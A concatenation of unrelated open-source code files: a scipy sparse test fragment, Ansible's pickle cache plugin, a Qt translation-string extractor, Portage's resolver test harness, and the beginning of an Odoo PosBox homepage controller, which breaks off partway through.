@with_64bit_maxval_limit(fixed_dtype=np.int64)
def check_unlimited():
# These involve indices larger than `downcast_maxval`
a = csc_matrix([[1, 2], [3, 4], [5, 6]])
a.getnnz(axis=1)
a.sum(axis=0)
a = csr_matrix([[1, 2, 3], [3, 4, 6]])
a.getnnz(axis=0)
a = coo_matrix([[1, 2, 3], [3, 4, 5]])
a.getnnz(axis=0)
check_limited()
check_unlimited()
if __name__ == "__main__":
run_module_suite()
| bsd-3-clause |
gregdek/ansible | lib/ansible/plugins/cache/pickle.py | 64 | 1997 | # (c) 2017, Brian Coca
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
cache: pickle
short_description: Pickle formatted files.
description:
        - This cache uses Python's pickle serialization format, in per-host files, saved to the filesystem.
version_added: "2.3"
author: Brian Coca (@bcoca)
options:
_uri:
required: True
description:
- Path in which the cache plugin will save the files
env:
- name: ANSIBLE_CACHE_PLUGIN_CONNECTION
ini:
- key: fact_caching_connection
section: defaults
_prefix:
description: User defined prefix to use when creating the files
env:
- name: ANSIBLE_CACHE_PLUGIN_PREFIX
ini:
- key: fact_caching_prefix
section: defaults
_timeout:
default: 86400
description: Expiration timeout for the cache plugin data
env:
- name: ANSIBLE_CACHE_PLUGIN_TIMEOUT
ini:
- key: fact_caching_timeout
section: defaults
'''
try:
import cPickle as pickle
except ImportError:
import pickle
from ansible.module_utils.six import PY3
from ansible.plugins.cache import BaseFileCacheModule
class CacheModule(BaseFileCacheModule):
"""
A caching module backed by pickle files.
"""
def _load(self, filepath):
# Pickle is a binary format
with open(filepath, 'rb') as f:
if PY3:
return pickle.load(f, encoding='bytes')
else:
return pickle.load(f)
def _dump(self, value, filepath):
with open(filepath, 'wb') as f:
# Use pickle protocol 2 which is compatible with Python 2.3+.
pickle.dump(value, f, protocol=2)
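# Illustrative usage sketch (not part of the plugin): the options documented
# above map onto ansible.cfg keys in the [defaults] section, roughly like the
# following; the selector key `fact_caching = pickle` and the example path are
# assumptions, not taken from this file.
#
#   [defaults]
#   fact_caching = pickle
#   fact_caching_connection = /tmp/ansible_fact_cache
#   fact_caching_prefix = facts_
#   fact_caching_timeout = 86400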
| gpl-3.0 |
pashakiz/DonCoin | share/qt/extract_strings_qt.py | 2945 | 1844 | #!/usr/bin/python
'''
Extract _("...") strings for translation and convert to Qt4 stringdefs so that
they can be picked up by Qt linguist.
'''
from subprocess import Popen, PIPE
import glob
import operator
OUT_CPP="src/qt/bitcoinstrings.cpp"
EMPTY=['""']
def parse_po(text):
"""
Parse 'po' format produced by xgettext.
Return a list of (msgid,msgstr) tuples.
"""
messages = []
msgid = []
msgstr = []
in_msgid = False
in_msgstr = False
for line in text.split('\n'):
line = line.rstrip('\r')
if line.startswith('msgid '):
if in_msgstr:
messages.append((msgid, msgstr))
in_msgstr = False
# message start
in_msgid = True
msgid = [line[6:]]
elif line.startswith('msgstr '):
in_msgid = False
in_msgstr = True
msgstr = [line[7:]]
elif line.startswith('"'):
if in_msgid:
msgid.append(line)
if in_msgstr:
msgstr.append(line)
if in_msgstr:
messages.append((msgid, msgstr))
return messages
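# Illustrative sketch (not used by the script): parse_po keeps the surrounding
# quotes and continuation lines exactly as xgettext emits them.
def _example_parse_po():
    sample = 'msgid "Loading addresses..."\nmsgstr ""\n'
    # returns [(['"Loading addresses..."'], ['""'])]
    return parse_po(sample)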
files = glob.glob('src/*.cpp') + glob.glob('src/*.h')
# xgettext -n --keyword=_ $FILES
child = Popen(['xgettext','--output=-','-n','--keyword=_'] + files, stdout=PIPE)
(out, err) = child.communicate()
messages = parse_po(out)
f = open(OUT_CPP, 'w')
f.write("""#include <QtGlobal>
// Automatically generated by extract_strings.py
#ifdef __GNUC__
#define UNUSED __attribute__((unused))
#else
#define UNUSED
#endif
""")
f.write('static const char UNUSED *bitcoin_strings[] = {\n')
messages.sort(key=operator.itemgetter(0))
for (msgid, msgstr) in messages:
if msgid != EMPTY:
f.write('QT_TRANSLATE_NOOP("bitcoin-core", %s),\n' % ('\n'.join(msgid)))
f.write('};')
f.close()
| mit |
candrews/portage | pym/portage/tests/resolver/ResolverPlayground.py | 2 | 28046 | # Copyright 2010-2015 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
from itertools import permutations
import fnmatch
import sys
import tempfile
import portage
from portage import os
from portage import shutil
from portage.const import (GLOBAL_CONFIG_PATH, PORTAGE_BASE_PATH,
USER_CONFIG_PATH)
from portage.dep import Atom, _repo_separator
from portage.package.ebuild.config import config
from portage.package.ebuild.digestgen import digestgen
from portage._sets import load_default_config
from portage._sets.base import InternalPackageSet
from portage.tests import cnf_path
from portage.util import ensure_dirs, normalize_path
from portage.versions import catsplit
import _emerge
from _emerge.actions import calc_depclean
from _emerge.Blocker import Blocker
from _emerge.create_depgraph_params import create_depgraph_params
from _emerge.depgraph import backtrack_depgraph
from _emerge.RootConfig import RootConfig
if sys.hexversion >= 0x3000000:
# pylint: disable=W0622
basestring = str
class ResolverPlayground(object):
"""
This class helps to create the necessary files on disk and
the needed settings instances, etc. for the resolver to do
its work.
"""
config_files = frozenset(("eapi", "layout.conf", "make.conf", "package.accept_keywords",
"package.keywords", "package.license", "package.mask", "package.properties",
"package.provided", "packages",
"package.unmask", "package.use", "package.use.aliases", "package.use.stable.mask",
"soname.provided",
"unpack_dependencies", "use.aliases", "use.force", "use.mask", "layout.conf"))
metadata_xml_template = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE pkgmetadata SYSTEM "http://www.gentoo.org/dtd/metadata.dtd">
<pkgmetadata>
<herd>%(herd)s</herd>
<maintainer>
<email>maintainer-needed@gentoo.org</email>
<description>Description of the maintainership</description>
</maintainer>
<longdescription>Long description of the package</longdescription>
<use>
%(flags)s
</use>
</pkgmetadata>
"""
def __init__(self, ebuilds={}, binpkgs={}, installed={}, profile={}, repo_configs={}, \
user_config={}, sets={}, world=[], world_sets=[], distfiles={},
eprefix=None, targetroot=False, debug=False):
"""
ebuilds: cpv -> metadata mapping simulating available ebuilds.
installed: cpv -> metadata mapping simulating installed packages.
If a metadata key is missing, it gets a default value.
profile: settings defined by the profile.
"""
self.debug = debug
if eprefix is None:
self.eprefix = normalize_path(tempfile.mkdtemp())
else:
self.eprefix = normalize_path(eprefix)
# Tests may override portage.const.EPREFIX in order to
# simulate a prefix installation. It's reasonable to do
# this because tests should be self-contained such that
# the "real" value of portage.const.EPREFIX is entirely
# irrelevant (see bug #492932).
portage.const.EPREFIX = self.eprefix.rstrip(os.sep)
self.eroot = self.eprefix + os.sep
if targetroot:
self.target_root = os.path.join(self.eroot, 'target_root')
else:
self.target_root = os.sep
self.distdir = os.path.join(self.eroot, "var", "portage", "distfiles")
self.pkgdir = os.path.join(self.eprefix, "pkgdir")
self.vdbdir = os.path.join(self.eroot, "var/db/pkg")
os.makedirs(self.vdbdir)
if not debug:
portage.util.noiselimit = -2
self._repositories = {}
#Make sure the main repo is always created
self._get_repo_dir("test_repo")
self._create_distfiles(distfiles)
self._create_ebuilds(ebuilds)
self._create_binpkgs(binpkgs)
self._create_installed(installed)
self._create_profile(ebuilds, installed, profile, repo_configs, user_config, sets)
self._create_world(world, world_sets)
self.settings, self.trees = self._load_config()
self._create_ebuild_manifests(ebuilds)
portage.util.noiselimit = 0
def reload_config(self):
"""
Reload configuration from disk, which is useful if it has
been modified after the constructor has been called.
"""
for eroot in self.trees:
portdb = self.trees[eroot]["porttree"].dbapi
portdb.close_caches()
self.settings, self.trees = self._load_config()
def _get_repo_dir(self, repo):
"""
Create the repo directory if needed.
"""
if repo not in self._repositories:
if repo == "test_repo":
self._repositories["DEFAULT"] = {"main-repo": repo}
repo_path = os.path.join(self.eroot, "var", "repositories", repo)
self._repositories[repo] = {"location": repo_path}
profile_path = os.path.join(repo_path, "profiles")
try:
os.makedirs(profile_path)
except os.error:
pass
repo_name_file = os.path.join(profile_path, "repo_name")
with open(repo_name_file, "w") as f:
f.write("%s\n" % repo)
return self._repositories[repo]["location"]
def _create_distfiles(self, distfiles):
os.makedirs(self.distdir)
for k, v in distfiles.items():
with open(os.path.join(self.distdir, k), 'wb') as f:
f.write(v)
def _create_ebuilds(self, ebuilds):
for cpv in ebuilds:
a = Atom("=" + cpv, allow_repo=True)
repo = a.repo
if repo is None:
repo = "test_repo"
metadata = ebuilds[cpv].copy()
copyright_header = metadata.pop("COPYRIGHT_HEADER", None)
eapi = metadata.pop("EAPI", "0")
misc_content = metadata.pop("MISC_CONTENT", None)
metadata.setdefault("DEPEND", "")
metadata.setdefault("SLOT", "0")
metadata.setdefault("KEYWORDS", "x86")
metadata.setdefault("IUSE", "")
unknown_keys = set(metadata).difference(
portage.dbapi.dbapi._known_keys)
if unknown_keys:
raise ValueError("metadata of ebuild '%s' contains unknown keys: %s" %
(cpv, sorted(unknown_keys)))
repo_dir = self._get_repo_dir(repo)
ebuild_dir = os.path.join(repo_dir, a.cp)
ebuild_path = os.path.join(ebuild_dir, a.cpv.split("/")[1] + ".ebuild")
try:
os.makedirs(ebuild_dir)
except os.error:
pass
with open(ebuild_path, "w") as f:
if copyright_header is not None:
f.write(copyright_header)
f.write('EAPI="%s"\n' % eapi)
for k, v in metadata.items():
f.write('%s="%s"\n' % (k, v))
if misc_content is not None:
f.write(misc_content)
def _create_ebuild_manifests(self, ebuilds):
tmpsettings = config(clone=self.settings)
tmpsettings['PORTAGE_QUIET'] = '1'
for cpv in ebuilds:
a = Atom("=" + cpv, allow_repo=True)
repo = a.repo
if repo is None:
repo = "test_repo"
repo_dir = self._get_repo_dir(repo)
ebuild_dir = os.path.join(repo_dir, a.cp)
ebuild_path = os.path.join(ebuild_dir, a.cpv.split("/")[1] + ".ebuild")
portdb = self.trees[self.eroot]["porttree"].dbapi
tmpsettings['O'] = ebuild_dir
if not digestgen(mysettings=tmpsettings, myportdb=portdb):
raise AssertionError('digest creation failed for %s' % ebuild_path)
def _create_binpkgs(self, binpkgs):
		# When using BUILD_ID, there can be multiple instances for the
# same cpv. Therefore, binpkgs may be an iterable instead of
# a dict.
items = getattr(binpkgs, 'items', None)
items = items() if items is not None else binpkgs
for cpv, metadata in items:
a = Atom("=" + cpv, allow_repo=True)
repo = a.repo
if repo is None:
repo = "test_repo"
pn = catsplit(a.cp)[1]
cat, pf = catsplit(a.cpv)
metadata = metadata.copy()
metadata.setdefault("SLOT", "0")
metadata.setdefault("KEYWORDS", "x86")
metadata.setdefault("BUILD_TIME", "0")
metadata["repository"] = repo
metadata["CATEGORY"] = cat
metadata["PF"] = pf
repo_dir = self.pkgdir
category_dir = os.path.join(repo_dir, cat)
if "BUILD_ID" in metadata:
binpkg_path = os.path.join(category_dir, pn,
"%s-%s.xpak"% (pf, metadata["BUILD_ID"]))
else:
binpkg_path = os.path.join(category_dir, pf + ".tbz2")
ensure_dirs(os.path.dirname(binpkg_path))
t = portage.xpak.tbz2(binpkg_path)
t.recompose_mem(portage.xpak.xpak_mem(metadata))
def _create_installed(self, installed):
for cpv in installed:
a = Atom("=" + cpv, allow_repo=True)
repo = a.repo
if repo is None:
repo = "test_repo"
vdb_pkg_dir = os.path.join(self.vdbdir, a.cpv)
try:
os.makedirs(vdb_pkg_dir)
except os.error:
pass
metadata = installed[cpv].copy()
metadata.setdefault("SLOT", "0")
metadata.setdefault("BUILD_TIME", "0")
metadata.setdefault("COUNTER", "0")
metadata.setdefault("KEYWORDS", "~x86")
unknown_keys = set(metadata).difference(
portage.dbapi.dbapi._known_keys)
unknown_keys.discard("BUILD_TIME")
unknown_keys.discard("BUILD_ID")
unknown_keys.discard("COUNTER")
unknown_keys.discard("repository")
unknown_keys.discard("USE")
unknown_keys.discard("PROVIDES")
unknown_keys.discard("REQUIRES")
if unknown_keys:
raise ValueError("metadata of installed '%s' contains unknown keys: %s" %
(cpv, sorted(unknown_keys)))
metadata["repository"] = repo
for k, v in metadata.items():
with open(os.path.join(vdb_pkg_dir, k), "w") as f:
f.write("%s\n" % v)
def _create_profile(self, ebuilds, installed, profile, repo_configs, user_config, sets):
user_config_dir = os.path.join(self.eroot, USER_CONFIG_PATH)
try:
os.makedirs(user_config_dir)
except os.error:
pass
for repo in self._repositories:
if repo == "DEFAULT":
continue
repo_dir = self._get_repo_dir(repo)
profile_dir = os.path.join(repo_dir, "profiles")
metadata_dir = os.path.join(repo_dir, "metadata")
os.makedirs(metadata_dir)
#Create $REPO/profiles/categories
categories = set()
for cpv in ebuilds:
ebuilds_repo = Atom("="+cpv, allow_repo=True).repo
if ebuilds_repo is None:
ebuilds_repo = "test_repo"
if ebuilds_repo == repo:
categories.add(catsplit(cpv)[0])
categories_file = os.path.join(profile_dir, "categories")
with open(categories_file, "w") as f:
for cat in categories:
f.write(cat + "\n")
#Create $REPO/profiles/license_groups
license_file = os.path.join(profile_dir, "license_groups")
with open(license_file, "w") as f:
f.write("EULA TEST\n")
repo_config = repo_configs.get(repo)
if repo_config:
for config_file, lines in repo_config.items():
if config_file not in self.config_files and not any(fnmatch.fnmatch(config_file, os.path.join(x, "*")) for x in self.config_files):
raise ValueError("Unknown config file: '%s'" % config_file)
if config_file in ("layout.conf",):
file_name = os.path.join(repo_dir, "metadata", config_file)
else:
file_name = os.path.join(profile_dir, config_file)
if "/" in config_file and not os.path.isdir(os.path.dirname(file_name)):
os.makedirs(os.path.dirname(file_name))
with open(file_name, "w") as f:
for line in lines:
f.write("%s\n" % line)
# Temporarily write empty value of masters until it becomes default.
# TODO: Delete all references to "# use implicit masters" when empty value becomes default.
if config_file == "layout.conf" and not any(line.startswith(("masters =", "# use implicit masters")) for line in lines):
f.write("masters =\n")
#Create $profile_dir/eclass (we fail to digest the ebuilds if it's not there)
os.makedirs(os.path.join(repo_dir, "eclass"))
# Temporarily write empty value of masters until it becomes default.
if not repo_config or "layout.conf" not in repo_config:
layout_conf_path = os.path.join(repo_dir, "metadata", "layout.conf")
with open(layout_conf_path, "w") as f:
f.write("masters =\n")
if repo == "test_repo":
#Create a minimal profile in /usr/portage
sub_profile_dir = os.path.join(profile_dir, "default", "linux", "x86", "test_profile")
os.makedirs(sub_profile_dir)
if not (profile and "eapi" in profile):
eapi_file = os.path.join(sub_profile_dir, "eapi")
with open(eapi_file, "w") as f:
f.write("0\n")
make_defaults_file = os.path.join(sub_profile_dir, "make.defaults")
with open(make_defaults_file, "w") as f:
f.write("ARCH=\"x86\"\n")
f.write("ACCEPT_KEYWORDS=\"x86\"\n")
use_force_file = os.path.join(sub_profile_dir, "use.force")
with open(use_force_file, "w") as f:
f.write("x86\n")
parent_file = os.path.join(sub_profile_dir, "parent")
with open(parent_file, "w") as f:
f.write("..\n")
if profile:
for config_file, lines in profile.items():
if config_file not in self.config_files:
raise ValueError("Unknown config file: '%s'" % config_file)
file_name = os.path.join(sub_profile_dir, config_file)
with open(file_name, "w") as f:
for line in lines:
f.write("%s\n" % line)
#Create profile symlink
os.symlink(sub_profile_dir, os.path.join(user_config_dir, "make.profile"))
#Create minimal herds.xml
herds_xml = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE herds SYSTEM "http://www.gentoo.org/dtd/herds.dtd">
<?xml-stylesheet href="/xsl/herds.xsl" type="text/xsl" ?>
<?xml-stylesheet href="/xsl/guide.xsl" type="text/xsl" ?>
<herds>
<herd>
<name>base-system</name>
<email>base-system@gentoo.org</email>
<description>Core system utilities and libraries.</description>
<maintainer>
    <email>base-system@gentoo.org</email>
<name>Base System</name>
<role>Base System Maintainer</role>
</maintainer>
</herd>
</herds>
"""
with open(os.path.join(metadata_dir, "metadata.xml"), 'w') as f:
f.write(herds_xml)
make_conf = {
"ACCEPT_KEYWORDS": "x86",
"CLEAN_DELAY": "0",
"DISTDIR" : self.distdir,
"EMERGE_WARNING_DELAY": "0",
"PKGDIR": self.pkgdir,
"PORTAGE_INST_GID": str(portage.data.portage_gid),
"PORTAGE_INST_UID": str(portage.data.portage_uid),
"PORTAGE_TMPDIR": os.path.join(self.eroot, 'var/tmp'),
}
if os.environ.get("NOCOLOR"):
make_conf["NOCOLOR"] = os.environ["NOCOLOR"]
# Pass along PORTAGE_USERNAME and PORTAGE_GRPNAME since they
# need to be inherited by ebuild subprocesses.
if 'PORTAGE_USERNAME' in os.environ:
make_conf['PORTAGE_USERNAME'] = os.environ['PORTAGE_USERNAME']
if 'PORTAGE_GRPNAME' in os.environ:
make_conf['PORTAGE_GRPNAME'] = os.environ['PORTAGE_GRPNAME']
make_conf_lines = []
for k_v in make_conf.items():
make_conf_lines.append('%s="%s"' % k_v)
if "make.conf" in user_config:
make_conf_lines.extend(user_config["make.conf"])
if not portage.process.sandbox_capable or \
os.environ.get("SANDBOX_ON") == "1":
# avoid problems from nested sandbox instances
make_conf_lines.append('FEATURES="${FEATURES} -sandbox -usersandbox"')
configs = user_config.copy()
configs["make.conf"] = make_conf_lines
for config_file, lines in configs.items():
if config_file not in self.config_files:
raise ValueError("Unknown config file: '%s'" % config_file)
file_name = os.path.join(user_config_dir, config_file)
with open(file_name, "w") as f:
for line in lines:
f.write("%s\n" % line)
#Create /usr/share/portage/config/make.globals
make_globals_path = os.path.join(self.eroot,
GLOBAL_CONFIG_PATH.lstrip(os.sep), "make.globals")
ensure_dirs(os.path.dirname(make_globals_path))
os.symlink(os.path.join(cnf_path, "make.globals"),
make_globals_path)
#Create /usr/share/portage/config/sets/portage.conf
default_sets_conf_dir = os.path.join(self.eroot, "usr/share/portage/config/sets")
try:
os.makedirs(default_sets_conf_dir)
except os.error:
pass
provided_sets_portage_conf = (
os.path.join(cnf_path, "sets", "portage.conf"))
os.symlink(provided_sets_portage_conf, os.path.join(default_sets_conf_dir, "portage.conf"))
set_config_dir = os.path.join(user_config_dir, "sets")
try:
os.makedirs(set_config_dir)
except os.error:
pass
for sets_file, lines in sets.items():
file_name = os.path.join(set_config_dir, sets_file)
with open(file_name, "w") as f:
for line in lines:
f.write("%s\n" % line)
def _create_world(self, world, world_sets):
#Create /var/lib/portage/world
var_lib_portage = os.path.join(self.eroot, "var", "lib", "portage")
os.makedirs(var_lib_portage)
world_file = os.path.join(var_lib_portage, "world")
world_set_file = os.path.join(var_lib_portage, "world_sets")
with open(world_file, "w") as f:
for atom in world:
f.write("%s\n" % atom)
with open(world_set_file, "w") as f:
for atom in world_sets:
f.write("%s\n" % atom)
def _load_config(self):
create_trees_kwargs = {}
if self.target_root != os.sep:
create_trees_kwargs["target_root"] = self.target_root
env = {
"PORTAGE_REPOSITORIES": "\n".join("[%s]\n%s" % (repo_name, "\n".join("%s = %s" % (k, v) for k, v in repo_config.items())) for repo_name, repo_config in self._repositories.items())
}
trees = portage.create_trees(env=env, eprefix=self.eprefix,
**create_trees_kwargs)
for root, root_trees in trees.items():
settings = root_trees["vartree"].settings
settings._init_dirs()
setconfig = load_default_config(settings, root_trees)
root_trees["root_config"] = RootConfig(settings, root_trees, setconfig)
return trees[trees._target_eroot]["vartree"].settings, trees
def run(self, atoms, options={}, action=None):
options = options.copy()
options["--pretend"] = True
if self.debug:
options["--debug"] = True
if action is None:
if options.get("--depclean"):
action = "depclean"
elif options.get("--prune"):
action = "prune"
if "--usepkgonly" in options:
options["--usepkg"] = True
global_noiselimit = portage.util.noiselimit
global_emergelog_disable = _emerge.emergelog._disable
try:
if not self.debug:
portage.util.noiselimit = -2
_emerge.emergelog._disable = True
if action in ("depclean", "prune"):
rval, cleanlist, ordered, req_pkg_count = \
calc_depclean(self.settings, self.trees, None,
options, action, InternalPackageSet(initial_atoms=atoms, allow_wildcard=True), None)
result = ResolverPlaygroundDepcleanResult(
atoms, rval, cleanlist, ordered, req_pkg_count)
else:
params = create_depgraph_params(options, action)
success, depgraph, favorites = backtrack_depgraph(
self.settings, self.trees, options, params, action, atoms, None)
depgraph._show_merge_list()
depgraph.display_problems()
result = ResolverPlaygroundResult(atoms, success, depgraph, favorites)
finally:
portage.util.noiselimit = global_noiselimit
_emerge.emergelog._disable = global_emergelog_disable
return result
def run_TestCase(self, test_case):
if not isinstance(test_case, ResolverPlaygroundTestCase):
raise TypeError("ResolverPlayground needs a ResolverPlaygroundTestCase")
for atoms in test_case.requests:
result = self.run(atoms, test_case.options, test_case.action)
if not test_case.compare_with_result(result):
return
def cleanup(self):
for eroot in self.trees:
portdb = self.trees[eroot]["porttree"].dbapi
portdb.close_caches()
if self.debug:
print("\nEROOT=%s" % self.eroot)
else:
shutil.rmtree(self.eroot)
class ResolverPlaygroundTestCase(object):
def __init__(self, request, **kwargs):
self.all_permutations = kwargs.pop("all_permutations", False)
self.ignore_mergelist_order = kwargs.pop("ignore_mergelist_order", False)
self.ambiguous_merge_order = kwargs.pop("ambiguous_merge_order", False)
self.ambiguous_slot_collision_solutions = kwargs.pop("ambiguous_slot_collision_solutions", False)
self.check_repo_names = kwargs.pop("check_repo_names", False)
self.merge_order_assertions = kwargs.pop("merge_order_assertions", False)
if self.all_permutations:
self.requests = list(permutations(request))
else:
self.requests = [request]
self.options = kwargs.pop("options", {})
self.action = kwargs.pop("action", None)
self.test_success = True
self.fail_msg = None
self._checks = kwargs.copy()
def compare_with_result(self, result):
checks = dict.fromkeys(result.checks)
for key, value in self._checks.items():
if not key in checks:
raise KeyError("Not an available check: '%s'" % key)
checks[key] = value
fail_msgs = []
for key, value in checks.items():
got = getattr(result, key)
expected = value
if key in result.optional_checks and expected is None:
continue
if key == "mergelist":
if not self.check_repo_names:
#Strip repo names if we don't check them
if got:
new_got = []
for cpv in got:
if cpv[:1] == "!":
new_got.append(cpv)
continue
new_got.append(cpv.split(_repo_separator)[0])
got = new_got
if expected:
new_expected = []
for obj in expected:
if isinstance(obj, basestring):
if obj[:1] == "!":
new_expected.append(obj)
continue
new_expected.append(
obj.split(_repo_separator)[0])
continue
new_expected.append(set())
for cpv in obj:
if cpv[:1] != "!":
cpv = cpv.split(_repo_separator)[0]
new_expected[-1].add(cpv)
expected = new_expected
if self.ignore_mergelist_order and got is not None:
got = set(got)
expected = set(expected)
if self.ambiguous_merge_order and got:
expected_stack = list(reversed(expected))
got_stack = list(reversed(got))
new_expected = []
match = True
while got_stack and expected_stack:
got_token = got_stack.pop()
expected_obj = expected_stack.pop()
if isinstance(expected_obj, basestring):
new_expected.append(expected_obj)
if got_token == expected_obj:
continue
# result doesn't match, so stop early
match = False
break
expected_obj = set(expected_obj)
try:
expected_obj.remove(got_token)
except KeyError:
# result doesn't match, so stop early
match = False
break
new_expected.append(got_token)
while got_stack and expected_obj:
got_token = got_stack.pop()
try:
expected_obj.remove(got_token)
except KeyError:
match = False
break
new_expected.append(got_token)
if not match:
# result doesn't match, so stop early
break
if expected_obj:
# result does not match, so stop early
match = False
new_expected.append(tuple(expected_obj))
break
if expected_stack:
# result does not match, add leftovers to new_expected
match = False
expected_stack.reverse()
new_expected.extend(expected_stack)
expected = new_expected
if match and self.merge_order_assertions:
for node1, node2 in self.merge_order_assertions:
if not (got.index(node1) < got.index(node2)):
fail_msgs.append("atoms: (" + \
", ".join(result.atoms) + "), key: " + \
("merge_order_assertions, expected: %s" % \
str((node1, node2))) + \
", got: " + str(got))
elif key == "slot_collision_solutions" and \
self.ambiguous_slot_collision_solutions:
# Tests that use all_permutations can have multiple
# outcomes here.
for x in expected:
if x == got:
expected = x
break
elif key in ("unstable_keywords", "needed_p_mask_changes",
"unsatisfied_deps", "required_use_unsatisfied") and \
expected is not None:
expected = set(expected)
elif key == "forced_rebuilds" and expected is not None:
expected = dict((k, set(v)) for k, v in expected.items())
if got != expected:
fail_msgs.append("atoms: (" + ", ".join(result.atoms) + "), key: " + \
key + ", expected: " + str(expected) + ", got: " + str(got))
if fail_msgs:
self.test_success = False
self.fail_msg = "\n".join(fail_msgs)
return False
return True
class ResolverPlaygroundResult(object):
checks = (
"success", "mergelist", "use_changes", "license_changes",
"unstable_keywords", "slot_collision_solutions",
"circular_dependency_solutions", "needed_p_mask_changes",
"unsatisfied_deps", "forced_rebuilds", "required_use_unsatisfied"
)
optional_checks = (
"forced_rebuilds",
"required_use_unsatisfied",
"unsatisfied_deps"
)
def __init__(self, atoms, success, mydepgraph, favorites):
self.atoms = atoms
self.success = success
self.depgraph = mydepgraph
self.favorites = favorites
self.mergelist = None
self.use_changes = None
self.license_changes = None
self.unstable_keywords = None
self.needed_p_mask_changes = None
self.slot_collision_solutions = None
self.circular_dependency_solutions = None
self.unsatisfied_deps = frozenset()
self.forced_rebuilds = None
self.required_use_unsatisfied = None
if self.depgraph._dynamic_config._serialized_tasks_cache is not None:
self.mergelist = []
host_root = self.depgraph._frozen_config._running_root.root
for x in self.depgraph._dynamic_config._serialized_tasks_cache:
if isinstance(x, Blocker):
self.mergelist.append(x.atom)
else:
repo_str = ""
if x.repo != "test_repo":
repo_str = _repo_separator + x.repo
build_id_str = ""
if (x.type_name == "binary" and
x.cpv.build_id is not None):
build_id_str = "-%s" % x.cpv.build_id
mergelist_str = x.cpv + build_id_str + repo_str
if x.built:
if x.operation == "merge":
desc = x.type_name
else:
desc = x.operation
mergelist_str = "[%s]%s" % (desc, mergelist_str)
if x.root != host_root:
mergelist_str += "{targetroot}"
self.mergelist.append(mergelist_str)
if self.depgraph._dynamic_config._needed_use_config_changes:
self.use_changes = {}
for pkg, needed_use_config_changes in \
self.depgraph._dynamic_config._needed_use_config_changes.items():
new_use, changes = needed_use_config_changes
self.use_changes[pkg.cpv] = changes
if self.depgraph._dynamic_config._needed_unstable_keywords:
self.unstable_keywords = set()
for pkg in self.depgraph._dynamic_config._needed_unstable_keywords:
self.unstable_keywords.add(pkg.cpv)
if self.depgraph._dynamic_config._needed_p_mask_changes:
self.needed_p_mask_changes = set()
for pkg in self.depgraph._dynamic_config._needed_p_mask_changes:
self.needed_p_mask_changes.add(pkg.cpv)
if self.depgraph._dynamic_config._needed_license_changes:
self.license_changes = {}
for pkg, missing_licenses in self.depgraph._dynamic_config._needed_license_changes.items():
self.license_changes[pkg.cpv] = missing_licenses
if self.depgraph._dynamic_config._slot_conflict_handler is not None:
self.slot_collision_solutions = []
handler = self.depgraph._dynamic_config._slot_conflict_handler
for change in handler.changes:
new_change = {}
for pkg in change:
new_change[pkg.cpv] = change[pkg]
self.slot_collision_solutions.append(new_change)
if self.depgraph._dynamic_config._circular_dependency_handler is not None:
handler = self.depgraph._dynamic_config._circular_dependency_handler
sol = handler.solutions
self.circular_dependency_solutions = dict(zip([x.cpv for x in sol.keys()], sol.values()))
if self.depgraph._dynamic_config._unsatisfied_deps_for_display:
self.unsatisfied_deps = set(dep_info[0][1]
for dep_info in self.depgraph._dynamic_config._unsatisfied_deps_for_display)
if self.depgraph._forced_rebuilds:
self.forced_rebuilds = dict(
(child.cpv, set(parent.cpv for parent in parents))
for child_dict in self.depgraph._forced_rebuilds.values()
for child, parents in child_dict.items())
required_use_unsatisfied = []
for pargs, kwargs in \
self.depgraph._dynamic_config._unsatisfied_deps_for_display:
if "show_req_use" in kwargs:
required_use_unsatisfied.append(pargs[1])
if required_use_unsatisfied:
self.required_use_unsatisfied = set(required_use_unsatisfied)
class ResolverPlaygroundDepcleanResult(object):
checks = (
"success", "cleanlist", "ordered", "req_pkg_count",
)
optional_checks = (
"ordered", "req_pkg_count",
)
def __init__(self, atoms, rval, cleanlist, ordered, req_pkg_count):
self.atoms = atoms
self.success = rval == 0
self.cleanlist = cleanlist
self.ordered = ordered
self.req_pkg_count = req_pkg_count
| gpl-2.0 |
ChawalitK/odoo | addons/hw_posbox_homepage/controllers/main.py | 1 | 8247 | # -*- coding: utf-8 -*-
import logging
import os
import time
import werkzeug
import subprocess
from os import listdir
import openerp
from openerp import http
from openerp.http import request
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
index_style = """
<style>
body {
width: 480px;
margin: 60px auto;
font-family: sans-serif;
text-align: justify;
color: #6B6B6B;
}
.text-red {
color: #FF0000;
}
</style>
"""
index_template = """
<!DOCTYPE HTML>
<html>
<head>
<title>Odoo's PosBox</title>
""" + index_style + """
</head>
<body>
<h1>Your PosBox is up and running</h1>
<p>
The PosBox is a hardware adapter that allows you to use
receipt printers and barcode scanners with Odoo's Point of
Sale, <b>version 8.0 or later</b>. You can start an <a href='https://www.odoo.com/start'>online free trial</a>,
or <a href='https://www.odoo.com/start?download'>download and install</a> it yourself.
</p>
<p>
For more information on how to setup the Point of Sale with
the PosBox, please refer to
<a href='https://www.odoo.com/documentation/user/point_of_sale/posbox/index.html'>the manual</a>.
</p>
<p>
To see the status of the connected hardware, please refer
to the <a href='/hw_proxy/status'>hardware status page</a>.
</p>
<p>
Wi-Fi can be configured by visiting the <a href='/wifi'>Wi-Fi configuration page</a>.
</p>
<p>
The PosBox software installed on this posbox is <b>version 14</b>;
the PosBox version number is independent of Odoo's. You can upgrade
the software on the <a href='/hw_proxy/upgrade/'>upgrade page</a>.
</p>
<p>For any other questions, please contact Odoo support at <a href='mailto:help@odoo.com'>help@odoo.com</a>
</p>
</body>
</html>
"""
class PosboxHomepage(openerp.addons.web.controllers.main.Home):
@http.route('/', type='http', auth='none', website=True)
def index(self):
#return request.render('hw_posbox_homepage.index',mimetype='text/html')
return index_template
@http.route('/wifi', type='http', auth='none', website=True)
def wifi(self):
wifi_template = """
<!DOCTYPE HTML>
<html>
<head>
<title>Wifi configuration</title>
""" + index_style + """
</head>
<body>
<h1>Configure wifi</h1>
<p>
Here you can configure how the posbox should connect to wireless networks.
Currently only Open and WPA networks are supported. When enabling the persistent checkbox,
the chosen network will be saved and the posbox will attempt to connect to it every time it boots.
</p>
<form action='/wifi_connect' method='POST'>
<table>
<tr>
<td>
ESSID:
</td>
<td>
<select name="essid">
"""
try:
f = open('/tmp/scanned_networks.txt', 'r')
